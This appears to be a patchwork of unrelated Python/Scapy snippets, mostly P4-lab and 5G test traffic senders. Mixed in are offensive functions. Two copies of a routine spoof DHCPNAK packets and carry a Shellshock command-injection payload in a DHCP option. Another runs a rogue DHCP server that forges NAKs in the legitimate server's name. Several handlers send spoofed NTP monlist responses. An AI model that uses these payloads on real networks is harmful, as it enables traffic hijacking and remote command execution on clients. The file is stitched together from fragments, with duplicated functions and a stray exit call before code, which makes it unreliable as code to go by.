def nak_request(self, packet):
# we are hereby handling the case where we detect one other dhcp server besides our own...
dhcp_server_mac = self.other_dhcp_servers.keys()[0]
dhcp_server_ip = self.other_dhcp_servers[self.other_dhcp_servers.keys()[0]]
print "Spoofing DHCPNAK from %s / %s" % (dhcp_server_mac, dhcp_server_ip)
nak = Ether(src=dhcp_server_mac, dst=packet[Ether].dst) / \
IP(src=dhcp_server_ip, dst=packet[IP].dst) / \
UDP(sport=67, dport=68) / \
BOOTP(op=2,
ciaddr=packet[IP].src,
siaddr=packet[IP].dst,
chaddr=packet[Ether].src,
xid=packet[BOOTP].xid) / \
DHCP(options=[
('server_id', dhcp_server_ip),
('message-type','nak'),
(114, "() { ignored;}; touch /tmp/test"),
('end')]
)
print "sending NAK:"
nak.show()
scapy.all.sendp(nak)
def nak_request(self, packet):
# we are hereby handling the case where we detect one other dhcp server besides our own...
dhcp_server_mac = self.other_dhcp_servers.keys()[0]
dhcp_server_ip = self.other_dhcp_servers[
self.other_dhcp_servers.keys()[0]]
print "Spoofing DHCPNAK from %s / %s" % (dhcp_server_mac,
dhcp_server_ip)
nak = Ether(src=dhcp_server_mac, dst=packet[Ether].dst) / \
IP(src=dhcp_server_ip, dst=packet[IP].dst) / \
UDP(sport=67, dport=68) / \
BOOTP(op=2,
ciaddr=packet[IP].src,
siaddr=packet[IP].dst,
chaddr=packet[Ether].src,
xid=packet[BOOTP].xid) / \
DHCP(options=[
('server_id', dhcp_server_ip),
('message-type','nak'),
(114, "() { ignored;}; touch /tmp/test"),
('end')]
)
print "sending NAK:"
nak.show()
scapy.all.sendp(nak)
def main():
if len(sys.argv)<3:
print 'pass 1 arguments: <destination> '
exit(1)
#src addr
addr = socket.gethostbyname(sys.argv[1])
#dst addr
addr1 = socket.gethostbyname(sys.argv[2])
iface = sys.argv[3]
# out_ether = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:00:01', type=0x894f)
# in_ether = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:00:01', type=0x800)
# pkt1 = Ether() / IP(src=addr,dst=addr1) / weightwriting() / TCP(dport=80, sport=20) / "hi"
# pkt1.show()
# hexdump(pkt1)
#sendp(pkt1, iface=iface, verbose=False)
print "sending on interface %s (Bmv2 port 0) to dmac=00:00:00:00:00:01" % (iface)
for i in range(0,120):
pkt = Ether() / IP() / weightwriting(index=i, weight=1) / UDP()
pkt.show()
pkt.hexdump()
sendp(pkt, iface=iface, verbose=False)
def send_packet(pkt_ip, cnt=1, ipVer=8, iface=None):
"""send packet through eth0 or 1st available interfaces"""
if iface is None:
ifs = get_if_list()
for i in ifs:
if "eth0" in i:
iface = i
break
if not iface: # tmp test
iface = 'lo'
if ipVer == 8:
pkt = Ether(src=get_if_hwaddr(iface),
dst='ff:ff:ff:ff:ff:ff',
type=0x888)
elif ipVer == 6:
pkt = Ether(src=get_if_hwaddr(iface),
dst='ff:ff:ff:ff:ff:ff',
type=0x86DD)
else:
print("IP version {} is not supported. Abort Early".format(inVer))
exit(1)
pkt = pkt / pkt_ip
pkt.show()
hexdump(pkt)
t0 = time.time()
sendp(pkt, iface=iface, count=cnt, inter=0.001, verbose=True)
t_span = time.time() - t0
print("send {} IPv{} packts use {} sec".format(cnt, ipVer, t_span))
return iface
def handle_arp(pkt):
'''
Handle packet containing ARP headers.
'''
glock.acquire()
print 'in handle_arp'
arp_header = pkt[ARP]
# Only respond to ARP requests
if arp_header.op != 1:
print 'arp header had wrong opcode'
glock.release()
return
# Convert the ARP request into in ARP reply
arp_header.op = 2
arp_header.hwdst = arp_header.hwsrc
pdst = arp_header.pdst
arp_header.hwsrc = ip_to_mac[pdst]
arp_header.pdst = arp_header.psrc
arp_header.psrc = pdst
# Send the response
print 'about to send arp response'
pkt = Ether(src=arp_header.hwsrc, dst=pkt[Ether].src) / arp_header
print 'sending arp response on interface %s:' % mac_to_intf[pkt[Ether].dst]
pkt.show()
glock.release()
sendp(pkt, iface=mac_to_intf[pkt[Ether].dst], verbose=0)
def handle_pkt(pkt, iface):
print iface
#NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" * 4
#NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64
NTP_ITEMS = "\x02"
NTP_ITEMS_INT = 2
NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + NTP_ITEMS + "\x00\x48" + "\x00" * 72 * NTP_ITEMS_INT
if IP in pkt and UDP in pkt and pkt[IP].src != h2_ip:
src_mac = pkt[Ether].src
dst_mac = pkt[Ether].dst
src_ip = pkt[IP].src
dst_ip = pkt[IP].dst
proto = pkt[IP].proto
sport = pkt[UDP].sport
dport = pkt[UDP].dport
id_tup = (src_ip, dst_ip, proto, sport, dport)
if src_ip in VALID_IPS:
if id_tup not in totals:
totals[id_tup] = 0
totals[id_tup] += 1
print ("Received from %s total: %s" %
(id_tup, totals[id_tup]))
# Respond with random payload
p = Ether(dst=src_mac,src=dst_mac)/IP(dst=pkt[IP].src,src=pkt[IP].dst)
p = p/UDP(dport=pkt[UDP].sport,sport=123)/NTP(NTP_MONLIST_RESPONSE)
print p.show()
sendp(p, iface = iface, loop=0)
def handle_pkt(pkt, iface):
#NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" * 4
#NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64
NTP_ITEMS = "\x06"
#ra = bytearray(random.getrandbits(8) for _ in xrange(3))
ra = "\x06\x01"
print ra.decode("utf-8")
exit(1)
NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + ra + "\x00\x48" + "\x00" * 72 * 6
if IP in pkt and UDP in pkt and pkt[IP].src != h2_ip:
src_mac = pkt[Ether].src
dst_mac = pkt[Ether].dst
src_ip = pkt[IP].src
dst_ip = pkt[IP].dst
proto = pkt[IP].proto
sport = pkt[UDP].sport
dport = pkt[UDP].dport
id_tup = (src_ip, dst_ip, proto, sport, dport)
if src_ip in VALID_IPS:
if id_tup not in totals:
totals[id_tup] = 0
totals[id_tup] += 1
print("Received from %s total: %s" % (id_tup, totals[id_tup]))
# Respond with random payload
p = Ether(dst=src_mac, src=dst_mac) / IP(dst=pkt[IP].src,
src=pkt[IP].dst)
p = p / UDP(dport=pkt[UDP].sport,
sport=123) / NTP(NTP_MONLIST_RESPONSE)
print p.show()
sendp(p, iface=iface, loop=0)
def main():
p = make_seq(num_parser, make_seq(op_parser,num_parser))
s = ''
iface = 'eth0'
while True:
s = str(input('> '))
if s == "quit":
break
print(s)
try:
i,ts = p(s,0,[])
print(f'ts is: {[t.value for t in ts]}')
pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc(op=ts[1].value,
operand_a=int(ts[0].value),
operand_b=int(ts[2].value))
pkt = pkt/' '
pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=False)
resp.show()
if resp:
p4calc=resp[P4calc]
if p4calc:
print((p4calc.result))
else:
print("cannot find P4calc header in the packet")
else:
print("Didn't receive response")
except Exception as error:
print(error)
def dhcp_manipulate(pkt):
global LegitDHCPServer, splittedIPv4, rougeServer, maxNAKReply
tempOptions = {}
for opt in pkt[DHCP].options:
if opt == 'end':
break
elif opt == 'pad':
break
else:
tempOptions[opt[0]] = opt[
1] # store the option tuple into dictionary
#print opt
#print tempOptions
if tempOptions['message-type'] == 1: # if msg is DHCP discover msg
print "Discover:"
#pkt.show()
#TODO: Normal Server offer options:{'server_id': '136.159.253.46', 'lease_time': 3600, 'name_server': '136.159.1.21', 'domain': 'ucalgary.ca', 46: '\x08', 'subnet_mask': '255.255.255.0', 'message-type': 2, 'router': '10.13.27.1'}
randomedIPv4Addr = splittedIPv4
randomedIPv4Addr[3] = str(random.randint(1, 255))
offerIPAddress = reassembleIPAddress(randomedIPv4Addr)
tmpRouter_id = splittedIPv4
tmpRouter_id[3] = '1'
router_id = reassembleIPAddress(tmpRouter_id)
print "Src: ", pkt[Ether].src
#TODO: Conver chaddr to Hex otherwise Wireshark will say it's different
OfferPacket = Ether(src=rougeServer['MAC'], dst=pkt[Ether].src)/IP(src=rougeServer['IP'],dst=offerIPAddress)/UDP(sport=67,dport=68)\
/BOOTP(op=2, yiaddr= offerIPAddress,ciaddr=pkt[IP].src,siaddr="0.0.0.0",chaddr=pkt[BOOTP].chaddr,giaddr=rougeServer['IP'], xid=pkt[BOOTP].xid)\
/DHCP(options=[('message-type','offer'),('server_id',rougeServer['IP']),('lease_time',3600),('subnet_mask','255.255.255.0'),('router', myIPv4Address), ('end')])
sendp(OfferPacket)
#print "Offer from rouge:"
OfferPacket.show()
print "Offer from rouge:"
elif tempOptions['message-type'] == 3: #if msg is Request message
print "Request:"
pkt.show()
print('From Legit')
# Fake NAK msg send by pretending legit DHCP Server. When we see request packet for
if tempOptions.has_key('server_id'):
if rougeServer['NAKReplyCounter'] < maxNAKReply and LegitDHCPServer[
'MAC'] == tempOptions['server_id']:
NAKreply = Ether(src=LegitDHCPServer['MAC'], dst=pkt[Ether].dst)/IP(src=LegitDHCPServer['IP'],dst=pkt[IP].dst)/UDP(sport=67,dport=68)\
/BOOTP(op=2, ciaddr=pkt[IP].src,siaddr=pkt[IP].dst,chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid)\
/DHCP(options=[('server_id',LegitDHCPServer['IP']),('message-type','nak'), ('end')])
sendp(NAKreply)
print "NAK sent out..."
rougeServer['NAKReplyCounter'] += 1 # increment NAK msg number
AckPacket = Ether(src=rougeServer['MAC'], dst=pkt[Ether].src)/IP(src=rougeServer['IP'],dst=tempOptions['requested_addr'])/UDP(sport=67,dport=68)\
/BOOTP(op=2, yiaddr=tempOptions['requested_addr'],ciaddr="0.0.0.0",siaddr="0.0.0.0",chaddr=pkt[BOOTP].chaddr,sname=pkt[BOOTP].sname,file=pkt[BOOTP].file,giaddr=rougeServer['IP'], xid=pkt[BOOTP].xid)\
/DHCP(options=[('message-type','ack'),('server_id',rougeServer['IP']),('lease_time',3600),('subnet_mask','255.255.255.0'),('router', myIPv4Address), ('end')])
AckPacket.show()
sendp(AckPacket)
elif tempOptions['message-type'] == 2:
pkt.show()
print('From Legit')
elif tempOptions['message-type'] == 5:
pkt.show()
print "From Legit"
def main():
iface = "veth1"
pkt = Ether(src='00:00:00:00:00:00', dst='00:00:00:00:00:01', type=0x800)
pkt.show()
hexdump(pkt) # show hexadecimal expression of packet
sendp(pkt, iface=iface, verbose=False)
print "sending on interface %s to dmac=00:00:00:00:00:01" % (iface)
def main():
if len(sys.argv) != 3:
print "Usage: send_magic_pkt.py [flowID] [target_pathID]"
print "For example: send_magic_pkt.py 1 2"
sys.exit(1)
flowID, pathID = sys.argv[1:]
p = Ether(type=0x101, dst="ff:ff:ff:ff:ff:ff") / MagicPkt(flowID=int(flowID), pathID=int(pathID))
print p.show()
sendp(p, iface = "eth0")
def send_random_traffic(dst, num_packets):
dst_mac = None
dst_ip = None
iface = [i for i in get_if_list() if 'eth0' in i][0]
src_mac = [get_if_hwaddr(i) for i in get_if_list() if 'eth0' in i]
if len(src_mac) < 1:
print("No interface for output")
sys.exit(1)
src_mac = src_mac[0]
src_ip = None
if src_mac == "00:00:00:00:01:01":
src_ip = "10.0.1.1"
elif src_mac == "00:00:00:00:02:02":
src_ip = "10.0.2.2"
elif src_mac == "00:00:00:00:03:03":
src_ip = "10.0.3.3"
elif src_mac == "00:00:00:00:04:04":
src_ip = "10.0.4.4"
else:
print("Invalid source host")
sys.exit(1)
if dst == 'h1':
dst_mac = "00:00:00:00:01:01"
dst_ip = "10.0.1.1"
elif dst == 'h2':
dst_mac = "00:00:00:00:02:02"
dst_ip = "10.0.2.2"
elif dst == 'h3':
dst_mac = "00:00:00:00:03:03"
dst_ip = "10.0.3.3"
elif dst == 'h4':
dst_mac = "00:00:00:00:04:04"
dst_ip = "10.0.4.4"
else:
print("Invalid host to send to")
sys.exit(1)
total_pkts = 0
# random_ports = random.sample(xrange(1024, 65535), 10000)
# for port in random_ports:
# num_packets = random.randint(50, 250)
# num_packets = 1
port = 1024
for i in range(num_packets):
# data = randomword(100)
data = 'a'
p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip)
p = p / UDP(dport=port) / Raw(load=data)
# p = p/TCP(dport=port)/Raw(load=data)
print p.show()
sendp(p, iface=iface, inter=0.01)
total_pkts += 1
print "Sent %s packets in total" % total_pkts
def icmp_reply(self, icmp_request):
reply = Ether(icmp_request)
reply.show()
reply[ICMP].type = 0
# Force re-generation of the checksum
reply[ICMP].chksum = None
reply[IP].src, reply[IP].dst = reply[IP].dst, reply[IP].src
reply[IP].chksum = None
reply[Ether].src, reply[Ether].dst = reply[Ether].dst, reply[Ether].src
if self.dst_mac is not None:
reply[Ether].dst = self.dst_mac
return bytes(reply)
def main():
if len(sys.argv) != 3:
print "Usage: send_magic_pkt.py [flowID] [target_pathID]"
print "For example: send_magic_pkt.py 1 2"
sys.exit(1)
flowID, pathID = sys.argv[1:]
p = Ether(type=0x101, dst="ff:ff:ff:ff:ff:ff") / MagicPkt(
flowID=int(flowID), pathID=int(pathID))
print p.show()
sendp(p, iface="eth0")
def send_random_traffic(dst, mode):
dst_mac = None
dst_ip = None
src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0']
if len(src_mac) < 1:
print("No interface for output")
sys.exit(1)
src_mac = src_mac[0]
src_ip = None
if src_mac == "00:00:00:00:00:01":
src_ip = "10.0.0.1"
elif src_mac == "00:00:00:00:00:02":
src_ip = "10.0.0.2"
elif src_mac == "00:00:00:00:00:03":
src_ip = "10.0.0.3"
elif src_mac == "00:00:00:00:00:04":
src_ip = "10.0.0.4"
else:
print("Invalid source host")
sys.exit(1)
if dst == 'h1':
dst_mac = "00:00:00:00:00:01"
dst_ip = "10.0.0.1"
elif dst == 'h2':
dst_mac = "00:00:00:00:00:22"
dst_ip = "10.0.0.10"
elif dst == 'h3':
dst_mac = "00:00:00:00:00:03"
dst_ip = "10.0.0.3"
elif dst == 'h4':
dst_mac = "00:00:00:00:00:04"
dst_ip = "10.0.0.4"
else:
print("Invalid host to send to")
sys.exit(1)
total_pkts = 0
if mode == '1':
random_ports = random.sample(xrange(1024, 65535), 40)
else:
random_ports = [1024, 1025, 1026]
for port in random_ports:
num_packets = 20
for i in range(num_packets):
data = randomword(100)
p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip)
p = p / TCP(dport=port) / Raw(load=data)
print p.show()
sendp(p, iface="eth0")
total_pkts += 1
print "Sent %s packets in total" % total_pkts
def main():
n = 4
for i in range(n):
p = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(dst="10.0.0.2")/TCP(reserved=2, dport=49152+i) / BytePkt(val=0)
# !!!! there is an error in scapy. The TCP stack still use 4 bit for the reserved key.
print p.show()
sendp(p, iface = "eth0")
#p = IP(dst="10.0.0.2")/TCP(reserved=2, dport=10000+i)
# !!!! there is an error in scapy. The TCP stack still use 4 bit for the reserved key.
#print p.show()
#send(p)
sleep(1)
def main():
iface = 'h1-eth0'
pkt = Ether(dst='00:04:00:00:03:01', src="00:04:00:00:01:01", type=0x800) / IP(src='10.0.0.1', dst='10.0.0.3', protocol=0x91) / Instr(opcode=0x00, rd=0, rs1=0, rs2=0)
pkt = pkt/' '
pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=True)
if resp:
print "hi"
print resp
else:
print "Didn't receive response"
def main():
n = 4
for i in range(n):
p = Ether(dst="ff:ff:ff:ff:ff:ff") / IP(dst="10.0.0.2") / TCP(
reserved=2, dport=49152 + i) / BytePkt(val=0)
# !!!! there is an error in scapy. The TCP stack still use 4 bit for the reserved key.
print p.show()
sendp(p, iface="eth0")
#p = IP(dst="10.0.0.2")/TCP(reserved=2, dport=10000+i)
# !!!! there is an error in scapy. The TCP stack still use 4 bit for the reserved key.
#print p.show()
#send(p)
sleep(1)
def downlink(pkt):
if IPv6 in pkt:
if UDP in pkt and pkt[UDP].dport == 2152:
#PAYLOAD PACKET
#pkt.show()
print "5G CORE TO DASH"
data = pkt[Raw].load
temp = dl_pdu_session(data)
data2 = temp[Padding].load
pkt2 = IPv6(data2)
pkt3 = Ether(dst="08:00:27:dd:dd:dd",
src="08:00:27:aa:aa:aa") / pkt2
pkt3.show()
sendp(pkt3, iface="eth2", verbose=False)
def delayReqPkt():
global iface, addr
DPSync = DPSyncTag(
etherType = 0x9487,
opCode = 0b0011,
reserved = 0,
originalPort = 0
)
pkt = Ether(src=get_if_hwaddr(iface), type=0x9487, dst='ff:ff:ff:ff:ff:ff')
pkt =pkt / IP(dst=addr) / DPSync / TS
pkt.show()
hexdump(pkt)
sendp(pkt, iface=iface, verbose=False)
def sendDelayReqPkt(pkt):
global iface
DPSync = DPSyncTag(etherType=0x9487,
opCode=0b0010,
reserved=0,
originalPort=0)
pkt2 = Ether(src=get_if_hwaddr(iface),
type=0x9487,
dst='ff:ff:ff:ff:ff:ff')
pkt2 = pkt2 / IP(dst=pkt[IP].src, src=pkt[IP].dst) / DPSync / TS
print("send the delay-req packet!!\n")
pkt2.show()
hexdump(pkt2)
sendp(pkt2, iface=iface, verbose=False)
def get_dhcp_discovery(interface, verbose=False):
# get interface hw addr
_, hw = get_if_raw_hwaddr(interface)
if verbose:
print(f"Interface: {interface} -> {hw}")
dhcp_discovery = Ether(dst="ff:ff:ff:ff:ff:ff") / IP(
src="0.0.0.0", dst="255.255.255.255") / UDP(
sport=68, dport=67) / BOOTP(chaddr=hw) / DHCP(
options=[("message-type", "discover"), "end"])
if verbose:
dhcp_discovery.show()
return dhcp_discovery
class EtherLayer(object):
"""docstring for TCPLayer"""
def __init__(self, arguments={}):
# super(IPLayer, self).__init__()
self.packet = None
if not isinstance(arguments, dict): return "Please provide a dictionay"
self.arguments = arguments
def make(self):
self.packet = Ether()
for param in self.arguments:
if not hasattr(self.packet, param): continue
setattr(self.packet, param , self.arguments[param])
return self
def updatePacket(self, arguments={}):
if not isinstance(arguments, dict): return "Please provide a dictionay"
for param in arguments:
if not hasattr(self.packet, param): continue
setattr(self.packet, param , arguments[param])
return self
def getPacket(self):
return self.packet
def show(self):
return self.packet.show()
def _getEther(self):
return Ether()
def addIP(self):
packet = IPLayer()._getIP()
self.packet = self.packet/packet
return self
def send_random_traffic(dst):
dst_mac = None
dst_ip = None
src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0']
if len(src_mac) < 1:
print("No interface for output")
sys.exit(1)
src_mac = src_mac[0]
src_ip = None
if src_mac == "00:00:00:00:00:01":
src_ip = "10.0.0.1"
elif src_mac == "00:00:00:00:00:02":
src_ip = "10.0.0.2"
elif src_mac == "00:00:00:00:00:03":
src_ip = "10.0.0.3"
else:
print("Invalid source host")
sys.exit(1)
if dst == 'h1':
dst_mac = "00:00:00:00:00:01"
dst_ip = "10.0.0.1"
elif dst == 'h2':
dst_mac = "00:00:00:00:00:02"
dst_ip = "10.0.0.2"
elif dst == 'h3':
dst_mac = "00:00:00:00:00:03"
dst_ip = "10.0.0.3"
else:
print("Invalid host to send to")
sys.exit(1)
total_pkts = 0
#random_ports = random.sample(xrange(1024, 65535), 10)
#for port in random_ports:
#um_packets = random.randint(50, 250)
#for i in range(num_packets):
for i in range(0, 10):
#data = randomword(100)
data = "abcd"
p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src="10.0.0.1")
p = p / TCP(dport=54321) / Raw(load=data)
print p.show()
sendp(p, iface="eth0")
total_pkts += 1
print "Sent %s packets in total" % total_pkts
def send_random_traffic(dst):
NTP_MONLIST_REQUEST = "\x17\x00\x03\x2a" + "\x00" * 4
#NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" * 4
NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64
dst_mac = None
dst_ip = None
src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0']
if len(src_mac) < 1:
print("No interface for output")
sys.exit(1)
src_mac = src_mac[0]
src_ip = None
if dst == 'h1':
dst_mac = "00:00:00:00:00:01"
dst_ip = "10.0.0.1"
elif dst == 'h2':
dst_mac = "00:00:00:00:00:02"
dst_ip = "10.0.0.2"
elif dst == 'h3':
dst_mac = "00:00:00:00:00:03"
dst_ip = "10.0.0.3"
else:
print("Invalid host to send to")
sys.exit(1)
# Create N src ip
N = 1
src_ip_list = list()
src_dict = dict()
for i in range(0, N):
src_ip_list.append(gen_random_ip())
total_pkts = 0
#for src_ip in src_ip_list:
for src_ip in ['10.0.0.1']:
num_packets = 10
port = random.randint(1024, 65535)
for i in range(num_packets):
data = set_payload(400)
p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip)
p = p / UDP(dport=123, sport=port) / NTP(NTP_MONLIST_REQUEST)
print p.show()
sendp(p, iface="eth0")
total_pkts += 1
#print('total_pkts untill now: ' + str(total_pkts))
print "Sent %s packets in total" % total_pkts
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--src-ip', type=str, help="The source IP address to use")
parser.add_argument('-d', '--dst-ip', type=str, help="The destination IP address to use")
parser.add_argument('-m', '--message', type=str, help="The message to include in packet")
parser.add_argument('-t', '--tmp', type=int, default=None, help='The timestamp to include in packet')
parser.add_argument('-n', '--pkt-num', type=int, default=1, help='The num of packets to send')
args = parser.parse_args()
src = socket.gethostbyname(args.src_ip)
dst = socket.gethostbyname(args.dst_ip)
#print addr
tmp = args.tmp
iface = get_if()
if (tmp is not None):
print "sending on interface {} from IP addr {} to IP addr {} with timestamp {}".format(iface, str(src), str(dst), str(tmp))
pkt = Ether(src=get_if_hwaddr(iface), dst='08:00:00:00:ff:00')
pkt = pkt / MyTimestamp(tmp=tmp) / IP(src=src, dst=dst) / args.message
else:
print "sending on interface {} from IP addr {} to IP addr {}".format(iface, str(src), str(dst))
pkt = Ether(src=get_if_hwaddr(iface), dst='08:00:00:00:ff:00')
pkt = pkt / IP(src=src, dst=dst) / TCP(dport=1234, sport=random.randint(49152,65535)) / args.message
pkt.show()
# hexdump(pkt)
# print "len(pkt) = ", len(pkt)
#sendp(pkt, iface=iface, verbose=False)
pkt_num = args.pkt_num
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
s.bind(('eth0', 0))
start_time = time.time()
for i in range(pkt_num):
#sendp(p, iface='h%d-eth0' %src)
#msg = "Sheng!" + str(i)
s.send(str(pkt))
#print len(str(p))
#print str(p)[46:]
#hexdump(p)
#print p.show()
#print struct.unpack("!I", str(p)[62:66])[0]
#print int(str(p)[62:66],16)
#time.sleep(delay)
print "sent" + str(pkt_num)
print time.time() - start_time
def downlink(pkt):
if IPv6 in pkt:
#if GTP_U_Header in pkt:
if UDP in pkt and pkt[UDP].dport == 2152:
#print "5G_CORE -> DN/UE"
#print "ORIGINAL PACKET"
#pkt.show()
#PAYLOAD PACKET
print "5G CORE TO CLIENT"
data = pkt[Raw].load
temp = dl_pdu_session(data)
data2 = temp[Padding].load
pkt2 = IPv6(data2)
pkt3 = Ether(dst="08:00:27:aa:aa:aa",
src="08:00:27:dd:dd:dd") / pkt2
pkt3.show()
sendp(pkt3, iface="eth2", verbose=False)
def send_random_traffic(dst):
dst_mac = None
dst_ip = None
src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0']
if len(src_mac) < 1:
print ("No interface for output")
sys.exit(1)
src_mac = src_mac[0]
src_ip = None
if src_mac =="00:00:00:00:00:01":
src_ip = "10.0.0.1"
elif src_mac =="00:00:00:00:00:02":
src_ip = "10.0.0.2"
elif src_mac =="00:00:00:00:00:03":
src_ip = "10.0.0.3"
else:
print ("Invalid source host")
sys.exit(1)
if dst == 'h1':
dst_mac = "00:00:00:00:00:01"
dst_ip = "10.0.0.1"
elif dst == 'h2':
dst_mac = "00:00:00:00:00:02"
dst_ip = "10.0.0.2"
elif dst == 'h3':
dst_mac = "00:00:00:00:00:03"
dst_ip = "10.0.0.3"
else:
print ("Invalid host to send to")
sys.exit(1)
total_pkts = 0
random_ports = random.sample(xrange(1024, 65535), 10)
for port in random_ports:
num_packets = random.randint(50, 250)
for i in range(num_packets):
data = randomword(100)
p = Ether(dst=dst_mac,src=src_mac)/IP(dst=dst_ip,src=src_ip)
p = p/TCP(dport=port)/Raw(load=data)
print p.show()
sendp(p, iface = "eth0")
total_pkts += 1
print "Sent %s packets in total" % total_pkts
def updownlink(pkt):
if IPv6 in pkt:
#if GTP_U_Header in pkt:
if UDP in pkt and pkt[UDP].dport == 2152:
#print "5G_CORE -> DN/UE"
#print "ORIGINAL PACKET"
#pkt.show()
#PAYLOAD PACKET
data = pkt[Raw].load
temp = dl_pdu_session(data)
if temp[dl_pdu_session].Spare == 2:
print "5G_CORE TO DASH"
#print "PAYLOAD PACKET"
data2 = temp[Padding].load
pkt2 = IPv6(data2)
pkt3 = Ether(dst="08:00:27:dd:dd:dd",
src="08:00:27:aa:aa:aa") / pkt2
pkt3.show()
sendp(pkt3, iface="eth2", verbose=False)
#sys.stdout.flush()
#main()
else:
print "DASH TO 5G_CORE"
#print "ORIGINAL PACKET"
pkt.show()
#5G PACKET CONSTRUCTION
pkt5g = Ether(
src='00:15:5d:00:00:04', dst='00:15:5d:00:00:00') / IPv6(
src="fc00::5", dst="fc00::1") / IPv6ExtHdrRouting(
type=4,
segleft=2,
addresses=["fc00::1", "fc00::101", "fc00::100"]) / UDP(
sport=64515, dport=2152) / GTP_U_Header(
TEID=32, Reserved=0, E=1) / dl_pdu_session(
gtp_ext=133, QoSID=14, Spare=1)
#Full packet (5G + USER DATA)
pkt2 = pkt5g / pkt[IPv6]
#print "5G FULL PACKET"
#pkt2.show()
sendp(pkt2, iface="eth1", verbose=False)
def send_random_traffic(dst):
dst_mac = None
dst_ip = None
src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0']
if len(src_mac) < 1:
print("No interface for output")
sys.exit(1)
src_mac = src_mac[0]
if dst == 'h1':
dst_mac = "00:00:00:00:00:01"
dst_ip = "10.0.0.1"
elif dst == 'h2':
dst_mac = "00:00:00:00:00:02"
dst_ip = "10.0.0.2"
else:
print("Invalid host to send to")
sys.exit(1)
total_pkts = 0
#random_ports = random.sample(xrange(1024, 65535), 10)
#for port in random_ports:
#um_packets = random.randint(50, 250)
#for i in range(num_packets):
tracked_ip = "10.0.0.1"
true_frequency = 0
for i in range(0, 10000):
data = randomword(5)
#generate ips between 10.10.0.0 and 10.0.255.255
src_ip = "10.0.0."
src_ip += ".".join(map(str,
(random.randint(0, 255) for _ in range(1))))
p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip)
p = p / TCP(dport=54321) / Raw(load=data)
print p.show()
sendp(p, iface="eth0")
total_pkts += 1
if src_ip == tracked_ip:
true_frequency += 1
print "Sent %s packets in total" % total_pkts
print "true frequency of %s is %d" % (tracked_ip, true_frequency)
def main():
p1 = make_seq(num_parser, make_seq(op_parser, num_parser))
p2 = make_seq(num_parser, op_parser)
s = ''
iface = 'enp131s0np1'
while True:
s = str(raw_input('> '))
if s == "quit":
break
print s
try:
if "R" in s or "A" in s:
i, ts = p2(s, 0, [])
pkt = Ether(src='00:15:4d:12:2d:c5',
dst='00:15:4d:00:00:00',
type=0x1234) / P4calc(op=ts[1].value,
operand_a=int(ts[0].value),
operand_b=int(0))
else:
i, ts = p1(s, 0, [])
pkt = Ether(src='00:15:4d:12:2d:c5',
dst='00:15:4d:00:00:00',
type=0x1234) / P4calc(op=ts[1].value,
operand_a=int(ts[0].value),
operand_b=int(ts[2].value))
pkt = pkt / ' '
pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=True)
if resp:
p4calc = resp[P4calc]
print p4calc.result
if p4calc:
print p4calc.result
else:
print "cannot find P4calc header in the packet"
else:
print "Didn't receive response"
except Exception as error:
print error
def send_random_traffic(host, num_of_messages):
NTP_ITEMS = "\x02"
NTP_ITEMS_INT = 2
NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + NTP_ITEMS + "\x00\x48" + "\x00" * 72 * NTP_ITEMS_INT
dst_mac = None
src_ip = None
dst_ip = None
legitimate_pkts = 0
spoofed_pkts = 0
total_pkts = 0
# host info -- can be anything
src_ip = '10.0.1.99'
src_mac = '00:00:00:00:01:99'
# Dest info
dst_ip = '10.0.1.' + host.split('h')[1]
dst_mac = '00:00:00:00:01:0' + host.split('h')[1]
# Get name of eth0 interface
iface_eth0 = ''
for i in get_if_list():
if 'eth0' in i or 's0' in i:
iface_eth0 = i
mac_iface_eth0 = get_if_hwaddr(iface_eth0)
ip_addr_eth0 = get_ip_address(iface_eth0)
if len(mac_iface_eth0) < 1:
print ("No interface for output")
sys.exit(1)
# Send request and sleep for some time
N = int(num_of_messages)
for i in range(N):
port = random.randint(1024, 65535)
p = Ether(dst=dst_mac,src=src_mac)/IP(dst=dst_ip,src=src_ip)
p = p/UDP(dport=123,sport=port)/NTP(NTP_MONLIST_RESPONSE)
print p.show()
sendp(p, iface = iface_eth0, loop=0)
total_pkts += 1
print ''
print "Sent %s packets in total" % total_pkts
def send_packet(pkt_ip, cnt=1, ipVer=8, iface=None):
"""send packet through eth0 or 1st available interfaces"""
if iface is None:
ifs = get_if_list()
for i in ifs:
if "eth0" in i:
iface = i
break
if not iface: # tmp test
iface = 'lo'
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff', type=0x888)
pkt = pkt / pkt_ip
pkt.show()
t0 = time.time()
sendp(pkt, iface=iface, count=cnt, inter=0.001, verbose=True)
t_span = time.time() - t0
